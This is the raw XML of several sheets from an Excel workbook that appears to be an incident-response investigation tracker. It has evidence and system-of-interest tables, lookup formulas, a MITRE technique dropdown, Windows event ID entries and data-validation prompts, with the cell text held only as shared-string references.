        <f t="array" ref="J21">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M21" s="87"/>
    </row>
    <row r="22" spans="1:14">
      <c r="B22" s="87"/>
      <c r="I22" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J22" s="104" t="str" cm="1">
        <f t="array" ref="J22">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M22" s="87"/>
    </row>
    <row r="23" spans="1:14">
      <c r="B23" s="87"/>
      <c r="I23" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J23" s="104" t="str" cm="1">
        <f t="array" ref="J23">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M23" s="87"/>
    </row>
    <row r="24" spans="1:14">
      <c r="B24" s="87"/>
      <c r="I24" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J24" s="104" t="str" cm="1">
        <f t="array" ref="J24">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M24" s="87"/>
    </row>
    <row r="25" spans="1:14">
      <c r="B25" s="87"/>
      <c r="I25" s="75" t="str">
        <f>IF(ISNA(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))),"",IF(INDEX(Evidence[Data Location], MATCH(SystemOfInterest[[#This Row],[Hostname]], Evidence[Hostname], 0))=0,"No","Yes"))</f>
        <v/>
      </c>
      <c r="J25" s="104" t="str" cm="1">
        <f t="array" ref="J25">_xlfn.TEXTJOIN(" | ", TRUE,_xlfn.UNIQUE(IF(IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],"")&lt;&gt;0,IF(Evidence[Hostname]=SystemOfInterest[[#This Row],[Hostname]],Evidence[Status],""),"")))</f>
        <v/>
      </c>
      <c r="M25" s="87"/>
    </row>
    <row r="26" spans="1:14">
      <c r="A26" s="19" t="s">
        <v>23</v>
      </c>
      <c r="B26" s="17"/>
      <c r="C26" s="17"/>
      <c r="D26" s="17"/>
      <c r="E26" s="17"/>
      <c r="F26" s="17"/>
      <c r="G26" s="17"/>
      <c r="H26" s="17"/>
      <c r="I26" s="17"/>
      <c r="J26" s="17"/>
      <c r="K26" s="17"/>
      <c r="L26" s="17"/>
      <c r="M26" s="17"/>
      <c r="N26" s="17"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="B2:B25">
    <cfRule type="expression" dxfId="179" priority="13">
      <formula>AND(ISBLANK($B2),NOT(SUMPRODUCT(--($A2:$S2&lt;&gt;""))=0))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="J2:J25">
    <cfRule type="containsText" dxfId="178" priority="6" operator="containsText" text="0">
      <formula>NOT(ISERROR(SEARCH("0",J2)))</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="177" priority="7" operator="equal">
      <formula>"Assigned"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="176" priority="8" operator="equal">
      <formula>"Ongoing analysis"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="175" priority="9" operator="equal">
      <formula>"Assigned"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="174" priority="10" operator="equal">
      <formula>"Completed analysis"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I2:I25">
    <cfRule type="cellIs" dxfId="173" priority="4" operator="equal">
      <formula>"Yes"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="172" priority="5" operator="equal">
      <formula>"No"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="M2:M25">
    <cfRule type="expression" dxfId="171" priority="3">
      <formula>AND(ISBLANK($M2),NOT(SUMPRODUCT(--($A2:$S2&lt;&gt;""))=0))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A2:A25">
    <cfRule type="duplicateValues" dxfId="170" priority="2"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="C2:C25">
    <cfRule type="expression" dxfId="169" priority="1">
      <formula>AND(ISBLANK($C2),NOT(SUMPRODUCT(--($A2:$S2&lt;&gt;""))=0))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="4">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25" xr:uid="{48C43CEE-52BD-4CA6-A3F0-CD024390A092}">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25" xr:uid="{BA6D1D81-4390-4F49-B3F7-83DB95770B34}">
      <formula1>members_NamedRange</formula1>
    </dataValidation>
    <dataValidation allowBlank="1" showInputMessage="1" showErrorMessage="1" promptTitle="Auto-Generated Data" prompt="This cell is automatically populated from the 'Data Location' field in the 'Evidence' sheet. Avoid overwriting manually to prevent discrepancies." sqref="I2:I25" xr:uid="{0D3F5281-C417-42A9-9C1D-99A5C99F9C85}"/>
    <dataValidation allowBlank="1" showInputMessage="1" showErrorMessage="1" promptTitle="Auto-Generated Data" prompt="This cell is automatically populated from the 'Status' field in the Evidence sheet. Avoid overwriting manually to prevent discrepancies." sqref="J2:J25" xr:uid="{A553F4CE-5A42-4CF5-AC7B-35062E8ACB59}"/>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 Values' tab under &quot;General Options &gt; Yes/No&quot;." xr:uid="{77F063A1-6C03-4CA2-ACD9-ECFEBC7CFBC6}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$5:$C$6</xm:f>
          </x14:formula1>
          <xm:sqref>L2:L25</xm:sqref>
        </x14:dataValidation>
        <x14:dataValidation type="list" operator="greaterThanOrEqual" showErrorMessage="1" errorTitle="Invalid Option Entered" error="Please choose from a valid list of options from the drop down list._x000a__x000a_Add this as an option to the drop down list by adding it in 'Dropdown List Values' tab under System of Interest &gt; OS&quot;." xr:uid="{14439F7A-0E48-41CC-994A-F88E8D71D887}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$71:$C$75</xm:f>
          </x14:formula1>
          <xm:sqref>E2:E25</xm:sqref>
        </x14:dataValidation>
        <x14:dataValidation type="list" operator="greaterThanOrEqual" showErrorMessage="1" errorTitle="Invalid Data Entered" error="Please choose from a valid list of options from the drop down list._x000a__x000a_If required, you may add this as an option to the drop down list by adding it in 'Dropdown List Values' tab under &quot;System of  Interest &gt; Status&quot;." xr:uid="{CB0AA999-F76B-4C4E-8563-C857AB1C918D}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$64:$C$69</xm:f>
          </x14:formula1>
          <xm:sqref>H2:H25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0062FF"/>
  </sheetPr>
  <dimension ref="A1:R35"/>
  <sheetViews>
    <sheetView topLeftCell="A4" zoomScaleNormal="100" workbookViewId="0">
      <selection activeCell="A13" sqref="A13"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="16" defaultRowHeight="15.75"/>
  <cols>
    <col min="1" max="1" width="21.19921875" customWidth="1"/>
    <col min="2" max="2" width="8.69921875" customWidth="1"/>
    <col min="3" max="3" width="20.3984375" customWidth="1"/>
    <col min="4" max="4" width="23.59765625" customWidth="1"/>
    <col min="10" max="10" width="18.8984375" customWidth="1"/>
    <col min="12" max="13" width="63.19921875" customWidth="1"/>
    <col min="14" max="14" width="29.69921875" customWidth="1"/>
    <col min="15" max="15" width="31.3984375" bestFit="1" customWidth="1"/>
    <col min="16" max="16" width="71.09765625" bestFit="1" customWidth="1"/>
    <col min="17" max="17" width="58.3984375" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:16">
      <c r="A1" t="s">
        <v>93</v>
      </c>
      <c r="B1" t="s">
        <v>94</v>
      </c>
      <c r="C1" t="s">
        <v>60</v>
      </c>
      <c r="D1" t="s">
        <v>95</v>
      </c>
      <c r="E1" t="s">
        <v>96</v>
      </c>
      <c r="F1" t="s">
        <v>97</v>
      </c>
      <c r="G1" t="s">
        <v>98</v>
      </c>
      <c r="H1" t="s">
        <v>99</v>
      </c>
      <c r="I1" t="s">
        <v>100</v>
      </c>
      <c r="J1" t="s">
        <v>101</v>
      </c>
      <c r="K1" t="s">
        <v>102</v>
      </c>
      <c r="L1" t="s">
        <v>103</v>
      </c>
      <c r="M1" t="s">
        <v>68</v>
      </c>
      <c r="N1" t="s">
        <v>104</v>
      </c>
      <c r="O1" t="s">
        <v>105</v>
      </c>
      <c r="P1" t="s">
        <v>106</v>
      </c>
    </row>
    <row r="2" spans="1:16">
      <c r="A2" s="98">
        <v>44675.635810185187</v>
      </c>
      <c r="O2" t="s">
        <v>107</v>
      </c>
      <c r="P2" t="s">
        <v>108</v>
      </c>
    </row>
    <row r="3" spans="1:16">
      <c r="A3" s="98"/>
      <c r="O3" t="s">
        <v>109</v>
      </c>
      <c r="P3" t="s">
        <v>110</v>
      </c>
    </row>
    <row r="4" spans="1:16">
      <c r="A4" s="98"/>
      <c r="O4" t="s">
        <v>109</v>
      </c>
      <c r="P4" t="s">
        <v>111</v>
      </c>
    </row>
    <row r="5" spans="1:16">
      <c r="A5" s="98"/>
      <c r="D5" t="s">
        <v>112</v>
      </c>
      <c r="O5" t="s">
        <v>113</v>
      </c>
      <c r="P5" t="s">
        <v>114</v>
      </c>
    </row>
    <row r="6" spans="1:16">
      <c r="A6" s="98"/>
      <c r="D6" t="s">
        <v>115</v>
      </c>
      <c r="E6" t="s">
        <v>116</v>
      </c>
      <c r="G6" t="s">
        <v>115</v>
      </c>
      <c r="H6" t="s">
        <v>117</v>
      </c>
      <c r="I6" t="s">
        <v>118</v>
      </c>
      <c r="J6" t="s">
        <v>119</v>
      </c>
      <c r="K6">
        <v>4624</v>
      </c>
      <c r="L6" t="s">
        <v>120</v>
      </c>
      <c r="O6" t="s">
        <v>121</v>
      </c>
      <c r="P6" t="s">
        <v>122</v>
      </c>
    </row>
    <row r="7" spans="1:16">
      <c r="A7" s="98"/>
      <c r="D7" t="s">
        <v>116</v>
      </c>
      <c r="E7" t="s">
        <v>116</v>
      </c>
      <c r="F7" t="s">
        <v>123</v>
      </c>
      <c r="G7" t="s">
        <v>115</v>
      </c>
      <c r="H7" t="s">
        <v>117</v>
      </c>
      <c r="I7" t="s">
        <v>118</v>
      </c>
      <c r="J7" t="s">
        <v>119</v>
      </c>
      <c r="K7">
        <v>4648</v>
      </c>
      <c r="O7" t="s">
        <v>124</v>
      </c>
      <c r="P7" t="s">
        <v>125</v>
      </c>
    </row>
    <row r="8" spans="1:16">
      <c r="A8" s="98"/>
      <c r="D8" s="94"/>
      <c r="E8" s="94"/>
      <c r="F8" s="94"/>
      <c r="G8" s="94"/>
      <c r="H8" s="94"/>
      <c r="K8" s="94"/>
      <c r="O8" t="s">
        <v>126</v>
      </c>
      <c r="P8" t="s">
        <v>127</v>
      </c>
    </row>
    <row r="9" spans="1:16">
      <c r="A9" s="126"/>
      <c r="B9" s="94"/>
      <c r="C9" s="94"/>
      <c r="D9" t="s">
        <v>128</v>
      </c>
      <c r="E9" s="94"/>
      <c r="F9" s="94"/>
      <c r="G9" s="94"/>
      <c r="H9" s="94"/>
      <c r="K9" s="94"/>
      <c r="L9" s="94"/>
      <c r="O9" s="94"/>
      <c r="P9" s="94"/>
    </row>
    <row r="10" spans="1:16">
      <c r="A10" s="126"/>
      <c r="B10" s="94"/>
      <c r="C10" s="94"/>
      <c r="D10" t="s">
        <v>115</v>
      </c>
      <c r="E10" t="s">
        <v>129</v>
      </c>
      <c r="G10" t="s">
        <v>115</v>
      </c>
      <c r="H10" t="s">
        <v>117</v>
      </c>
      <c r="I10" t="s">
        <v>118</v>
      </c>
      <c r="J10" t="s">
        <v>119</v>
      </c>
      <c r="K10">
        <v>4624</v>
      </c>
      <c r="L10" s="94" t="s">
        <v>130</v>
      </c>
      <c r="O10" s="94"/>
      <c r="P10" s="94"/>
    </row>
    <row r="11" spans="1:16">
      <c r="A11" s="126"/>
      <c r="B11" s="94"/>
      <c r="C11" s="94"/>
      <c r="D11" t="s">
        <v>116</v>
      </c>
      <c r="E11" t="s">
        <v>116</v>
      </c>
      <c r="F11" t="s">
        <v>123</v>
      </c>
      <c r="G11" t="s">
        <v>115</v>
      </c>
      <c r="I11" t="s">
        <v>131</v>
      </c>
      <c r="J11" t="s">
        <v>119</v>
      </c>
      <c r="K11">
        <v>1024</v>
      </c>
      <c r="L11" s="94"/>
      <c r="O11" s="94"/>
      <c r="P11" s="94"/>
    </row>
    <row r="12" spans="1:16">
      <c r="A12" s="126"/>
      <c r="B12" s="94"/>
      <c r="C12" s="94"/>
      <c r="D12" s="94" t="s">
        <v>115</v>
      </c>
      <c r="E12" s="94" t="s">
        <v>129</v>
      </c>
      <c r="F12" s="94"/>
      <c r="G12" s="94" t="s">
        <v>115</v>
      </c>
      <c r="H12" s="94" t="s">
        <v>117</v>
      </c>
      <c r="I12" t="s">
        <v>132</v>
      </c>
      <c r="J12" t="s">
        <v>119</v>
      </c>
      <c r="K12" s="94">
        <v>1149</v>
      </c>
      <c r="L12" s="94"/>
      <c r="O12" s="94"/>
      <c r="P12" s="94"/>
    </row>
    <row r="13" spans="1:16">
      <c r="A13" s="126"/>
      <c r="B13" s="94"/>
      <c r="C13" s="94"/>
      <c r="D13" t="s">
        <v>116</v>
      </c>
      <c r="E13" t="s">
        <v>116</v>
      </c>
      <c r="F13" t="s">
        <v>123</v>
      </c>
      <c r="G13" t="s">
        <v>115</v>
      </c>
      <c r="H13" t="s">
        <v>117</v>
      </c>
      <c r="I13" t="s">
        <v>133</v>
      </c>
      <c r="J13" t="s">
        <v>134</v>
      </c>
      <c r="K13" t="s">
        <v>135</v>
      </c>
      <c r="L13" s="94"/>
      <c r="O13" s="94"/>
      <c r="P13" s="94"/>
    </row>
    <row r="14" spans="1:16">
      <c r="A14" s="98"/>
      <c r="O14" t="s">
        <v>136</v>
      </c>
      <c r="P14" t="s">
        <v>137</v>
      </c>
    </row>
    <row r="15" spans="1:16">
      <c r="A15" s="98"/>
      <c r="D15" t="s">
        <v>138</v>
      </c>
      <c r="O15" t="s">
        <v>139</v>
      </c>
    </row>
    <row r="16" spans="1:16">
      <c r="A16" s="98"/>
      <c r="D16" t="s">
        <v>140</v>
      </c>
      <c r="E16" t="s">
        <v>140</v>
      </c>
      <c r="F16" t="s">
        <v>141</v>
      </c>
      <c r="G16" t="s">
        <v>142</v>
      </c>
      <c r="H16" t="s">
        <v>143</v>
      </c>
      <c r="I16" t="s">
        <v>118</v>
      </c>
      <c r="J16" t="s">
        <v>119</v>
      </c>
      <c r="K16">
        <v>4688</v>
      </c>
      <c r="L16" t="s">
        <v>144</v>
      </c>
      <c r="O16" t="s">
        <v>107</v>
      </c>
      <c r="P16" t="s">
        <v>145</v>
      </c>
    </row>
    <row r="17" spans="1:18">
      <c r="A17" s="98"/>
      <c r="O17" t="s">
        <v>146</v>
      </c>
      <c r="P17" t="s">
        <v>147</v>
      </c>
    </row>
    <row r="18" spans="1:18">
      <c r="A18" s="98"/>
      <c r="D18" t="s">
        <v>148</v>
      </c>
      <c r="O18" t="s">
        <v>149</v>
      </c>
    </row>
    <row r="19" spans="1:18">
      <c r="A19" s="98"/>
      <c r="D19" t="s">
        <v>150</v>
      </c>
      <c r="E19" t="s">
        <v>150</v>
      </c>
      <c r="F19" t="s">
        <v>151</v>
      </c>
      <c r="I19" t="s">
        <v>133</v>
      </c>
      <c r="J19" t="s">
        <v>152</v>
      </c>
      <c r="O19" t="s">
        <v>153</v>
      </c>
      <c r="P19" t="s">
        <v>154</v>
      </c>
    </row>
    <row r="20" spans="1:18">
      <c r="A20" s="98"/>
      <c r="D20" t="s">
        <v>150</v>
      </c>
      <c r="E20" t="s">
        <v>150</v>
      </c>
      <c r="F20" t="s">
        <v>151</v>
      </c>
      <c r="I20" t="s">
        <v>155</v>
      </c>
      <c r="J20" t="s">
        <v>152</v>
      </c>
      <c r="O20" t="s">
        <v>156</v>
      </c>
    </row>
    <row r="21" spans="1:18">
      <c r="A21" s="98"/>
      <c r="I21" t="s">
        <v>133</v>
      </c>
      <c r="J21" t="s">
        <v>157</v>
      </c>
      <c r="O21" t="s">
        <v>158</v>
      </c>
    </row>
    <row r="22" spans="1:18">
      <c r="A22" s="98"/>
      <c r="I22" t="s">
        <v>133</v>
      </c>
      <c r="J22" t="s">
        <v>134</v>
      </c>
      <c r="K22" t="s">
        <v>159</v>
      </c>
      <c r="O22" t="s">
        <v>160</v>
      </c>
    </row>
    <row r="23" spans="1:18">
      <c r="A23" s="98"/>
      <c r="O23" t="s">
        <v>161</v>
      </c>
    </row>
    <row r="24" spans="1:18">
      <c r="A24" s="98"/>
      <c r="O24" t="s">
        <v>162</v>
      </c>
    </row>
    <row r="25" spans="1:18">
      <c r="A25" s="98"/>
      <c r="O25" t="s">
        <v>163</v>
      </c>
    </row>
    <row r="26" spans="1:18">
      <c r="A26" s="98"/>
      <c r="O26" t="s">
        <v>164</v>
      </c>
    </row>
    <row r="27" spans="1:18">
      <c r="A27" s="98"/>
      <c r="O27" t="s">
        <v>165</v>
      </c>
    </row>
    <row r="28" spans="1:18">
      <c r="A28" s="98"/>
      <c r="O28" t="s">
        <v>166</v>
      </c>
      <c r="R28">
        <f>SUBTOTAL(103,Evidence[Notes])</f>
        <v>0</v>
      </c>
    </row>
    <row r="29" spans="1:18">
      <c r="A29" s="98"/>
      <c r="O29" t="s">
        <v>167</v>
      </c>
      <c r="P29" t="s">
        <v>168</v>
      </c>
    </row>
    <row r="30" spans="1:18">
      <c r="A30" s="98"/>
      <c r="O30" t="s">
        <v>169</v>
      </c>
    </row>
    <row r="31" spans="1:18">
      <c r="A31" s="98"/>
      <c r="O31" t="s">
        <v>170</v>
      </c>
      <c r="P31" t="s">
        <v>171</v>
      </c>
    </row>
    <row r="32" spans="1:18">
      <c r="A32" s="98"/>
      <c r="O32" t="s">
        <v>172</v>
      </c>
      <c r="P32" t="s">
        <v>173</v>
      </c>
    </row>
    <row r="33" spans="1:16">
      <c r="A33" s="98"/>
      <c r="O33" t="s">
        <v>174</v>
      </c>
    </row>
    <row r="34" spans="1:16" ht="16.5" thickBot="1">
      <c r="A34" s="98"/>
      <c r="O34" t="s">
        <v>175</v>
      </c>
      <c r="P34" t="s">
        <v>176</v>
      </c>
    </row>
    <row r="35" spans="1:16" ht="16.5" thickBot="1">
      <c r="A35" s="19" t="s">
        <v>23</v>
      </c>
      <c r="B35" s="17"/>
      <c r="C35" s="17"/>
      <c r="D35" s="17"/>
      <c r="E35" s="17"/>
      <c r="F35" s="17"/>
      <c r="G35" s="17"/>
      <c r="H35" s="17"/>
      <c r="I35" s="17"/>
      <c r="J35" s="17"/>
      <c r="K35" s="17"/>
      <c r="L35" s="17"/>
      <c r="M35" s="17"/>
      <c r="N35" s="17"/>
      <c r="O35" s="17"/>
      <c r="P35" s="17"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="P2:P34">
    <cfRule type="expression" dxfId="148" priority="1">
      <formula>AND(ISBLANK($O2), NOT(ISBLANK($P2)))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="6">
    <dataValidation type="list" showInputMessage="1" showErrorMessage="1" sqref="D2:D4 D21:D34" xr:uid="{D21364B1-D910-4EB7-94C7-849B3B35A8A0}">
      <formula1>SOIHostname_NamedRange</formula1>
    </dataValidation>
    <dataValidation showInputMessage="1" showErrorMessage="1" sqref="D5:D7 D9:D20" xr:uid="{6A7D5643-F129-4B83-A94D-BA4A47F002B3}"/>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="O2:O34" xr:uid="{F510D4C8-82E3-45E8-BF1D-C53AFE1A0884}">
      <formula1>MITRETechnique_NamedRange</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="P2:P34" xr:uid="{E5C65F54-F0FA-4643-A403-01AAF78B6306}">
      <formula1>OFFSET(INDIRECT("MT[[#Headers],[ID]]"),MATCH(INDEX(INDIRECT("MT[ID]"), MATCH($O2,INDIRECT("MT[name]"),0)),INDIRECT("MT[sub-technique of]"),0),1,COUNTIF(INDIRECT("MT[sub-technique of]"),INDEX(INDIRECT("MT[ID]"), MATCH($O2,INDIRECT("MT[name]"),0))),1)</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34" xr:uid="{6B46F55E-4122-405E-A972-12F6A7C12A29}">
      <formula1>members_NamedRange</formula1>
    </dataValidation>
    <dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="N2:N34" xr:uid="{7F07BC90-B592-4085-A563-18980D78E6F6}">
      <formula1>$C$559:$C$572</formula1>
    </dataValidation>
  </dataValidation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4">
        <x14:dataValidation type="list" allowBlank="1" showInputMessage="1" showErrorMessage="1" xr:uid="{E4779463-FE6C-4DE0-927F-22219E85EF67}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$137:$C$156</xm:f>
          </x14:formula1>
          <xm:sqref>K2:K7 K9:K34</xm:sqref>
        </x14:dataValidation>
        <x14:dataValidation type="list" showInputMessage="1" showErrorMessage="1" xr:uid="{8200BA85-002B-4EDB-A605-22ADEDEC1EB3}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$104:$C$120</xm:f>
          </x14:formula1>
          <xm:sqref>I2:I7 I9:I34</xm:sqref>
        </x14:dataValidation>
        <x14:dataValidation type="list" showInputMessage="1" showErrorMessage="1" xr:uid="{F646F141-DE01-4892-BCC0-ABD844D39BAB}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$122:$C$135</xm:f>
          </x14:formula1>
          <xm:sqref>J2:J7 J9:J34</xm:sqref>
        </x14:dataValidation>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 Values' tab under &quot;General Options &gt; Yes/No&quot;." xr:uid="{64D39732-B0D2-4C54-9319-B5F811467AB1}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$5:$C$6</xm:f>
          </x14:formula1>
          <xm:sqref>B2:B34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62FF"/>
  </sheetPr>
  <dimension ref="A1:I24"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="I4" sqref="I4"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="11" defaultRowHeight="15.75"/>
  <cols>
    <col min="1" max="1" width="15.19921875" customWidth="1"/>
    <col min="2" max="2" width="13.69921875" customWidth="1"/>
    <col min="3" max="3" width="20.3984375" customWidth="1"/>
    <col min="4" max="5" width="19.3984375" customWidth="1"/>
    <col min="6" max="6" width="23.59765625" bestFit="1" customWidth="1"/>
    <col min="7" max="7" width="19.3984375" customWidth="1"/>
    <col min="8" max="8" width="21.69921875" customWidth="1"/>
    <col min="9" max="9" width="58.69921875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:9">
      <c r="A1" t="s">
        <v>3</v>
      </c>
      <c r="B1" t="s">
        <v>60</v>
      </c>
      <c r="C1" t="s">
        <v>177</v>
      </c>
      <c r="D1" t="s">
        <v>71</v>
      </c>
      <c r="E1" t="s">
        <v>178</v>
      </c>
      <c r="F1" t="s">
        <v>179</v>
      </c>
      <c r="G1" t="s">
        <v>180</v>
      </c>
      <c r="H1" t="s">
        <v>181</v>
      </c>
      <c r="I1" t="s">
        <v>182</v>
      </c>
    </row>
    <row r="2" spans="1:9">
      <c r="A2" s="87"/>
      <c r="F2" s="87"/>
    </row>
    <row r="3" spans="1:9">
      <c r="A3" s="87"/>
      <c r="F3" s="87"/>
    </row>
    <row r="4" spans="1:9">
      <c r="A4" s="87"/>
      <c r="F4" s="87"/>
    </row>
    <row r="5" spans="1:9">
      <c r="A5" s="87"/>
      <c r="F5" s="87"/>
    </row>
    <row r="6" spans="1:9">
      <c r="A6" s="87"/>
      <c r="F6" s="87"/>
    </row>
    <row r="7" spans="1:9">
      <c r="A7" s="87"/>
      <c r="F7" s="87"/>
    </row>
    <row r="8" spans="1:9">
      <c r="A8" s="87"/>
      <c r="F8" s="87"/>
    </row>
    <row r="9" spans="1:9">
      <c r="A9" s="87"/>
      <c r="F9" s="87"/>
    </row>
    <row r="10" spans="1:9">
      <c r="A10" s="87"/>
      <c r="F10" s="87"/>
    </row>
    <row r="11" spans="1:9">
      <c r="A11" s="87"/>
      <c r="F11" s="87"/>
    </row>
    <row r="12" spans="1:9">
      <c r="A12" s="87"/>
      <c r="F12" s="87"/>
    </row>
    <row r="13" spans="1:9">
      <c r="A13" s="87"/>
      <c r="F13" s="87"/>
    </row>
    <row r="14" spans="1:9">
      <c r="A14" s="87"/>
      <c r="F14" s="87"/>
    </row>
    <row r="15" spans="1:9">
      <c r="A15" s="87"/>
      <c r="F15" s="87"/>
    </row>
    <row r="16" spans="1:9">
      <c r="A16" s="87"/>
      <c r="F16" s="87"/>
    </row>
    <row r="17" spans="1:9">
      <c r="A17" s="87"/>
      <c r="F17" s="87"/>
    </row>
    <row r="18" spans="1:9">
      <c r="A18" s="87"/>
      <c r="F18" s="87"/>
    </row>
    <row r="19" spans="1:9">
      <c r="A19" s="87"/>
      <c r="F19" s="87"/>
    </row>
    <row r="20" spans="1:9">
      <c r="A20" s="87"/>
      <c r="F20" s="87"/>
    </row>
    <row r="21" spans="1:9">
      <c r="A21" s="87"/>
      <c r="F21" s="87"/>
    </row>
    <row r="22" spans="1:9">
      <c r="A22" s="87"/>
      <c r="F22" s="87"/>
    </row>
    <row r="23" spans="1:9" ht="16.5" thickBot="1">
      <c r="A23" s="87"/>
      <c r="F23" s="87"/>
    </row>
    <row r="24" spans="1:9" ht="16.5" thickBot="1">
      <c r="A24" s="19" t="s">
        <v>23</v>
      </c>
      <c r="B24" s="17"/>
      <c r="C24" s="17"/>
      <c r="D24" s="17"/>
      <c r="E24" s="17"/>
      <c r="F24" s="17"/>
      <c r="G24" s="17"/>
      <c r="H24" s="17"/>
      <c r="I24" s="18"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="C2:C23">
    <cfRule type="duplicateValues" dxfId="128" priority="1"/>
  </conditionalFormatting>
  <dataValidations count="2">
    <dataValidation type="date" operator="equal" allowBlank="1" showInputMessage="1" showErrorMessage="1" errorTitle="Invalid Date Entered" error="Date added does not match current date. If for whatever reason the date added needs to reflect an earlier or later date, please enter the value into another cell, and then paste it into the value." sqref="A2:A23" xr:uid="{67F5505D-51C7-4DD0-B9E6-02BA67935E77}">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3" xr:uid="{A0F0AED7-9777-4432-AFFD-8A89911AC1ED}">
      <formula1>members_NamedRange</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InputMessage="1" showErrorMessage="1" error="Please choose from a valid list of options from the drop down list._x000a__x000a_If required, you may add this as an option to the drop down list by adding it in 'Dropdown List Values' tab under &quot;Account &gt; Type&quot;." xr:uid="{E3562364-3D3C-49A3-8F8D-F42F8C074D47}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$96:$C$101</xm:f>
          </x14:formula1>
          <xm:sqref>D2:D23</xm:sqref>
        </x14:dataValidation>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 Values' tab under &quot;General Options &gt; Yes/No&quot;." xr:uid="{F6F55589-04C2-4D57-B916-678790DE941A}">
          <x14:formula1>
            <xm:f>'Dropdown Lists Values'!$C$5:$C$6</xm:f>
          </x14:formula1>
          <xm:sqref>G2:G23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B8E3B-39A2-489E-AF0E-B8248E3A17D0}">
  <sheetPr codeName="Sheet2">
    <tabColor rgb="FF0062FF"/>
  </sheetPr>
  <dimension ref="A1:E29"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="E6" sqref="E6"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="8.796875" defaultRowHeight="15.75"/>
  <cols>
    <col min="1" max="1" width="15.8984375" customWidth="1"/>
    <col min="2" max="2" width="13.09765625" customWidth="1"/>
    <col min="3" max="3" width="24" customWidth="1"/>
    <col min="4" max="4" width="30.19921875" customWidth="1"/>
    <col min="5" max="5" width="186.19921875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:5">
      <c r="A1" t="s">
        <v>59</v>
      </c>
      <c r="B1" t="s">
        <v>60</v>
      </c>
      <c r="C1" t="s">
        <v>71</v>
      </c>
      <c r="D1" t="s">
        <v>183</v>
      </c>
      <c r="E1" t="s">
        <v>68</v>
      </c>
    </row>
    <row r="2" spans="1:5">
      <c r="A2" s="87"/>
    </row>
    <row r="3" spans="1:5">
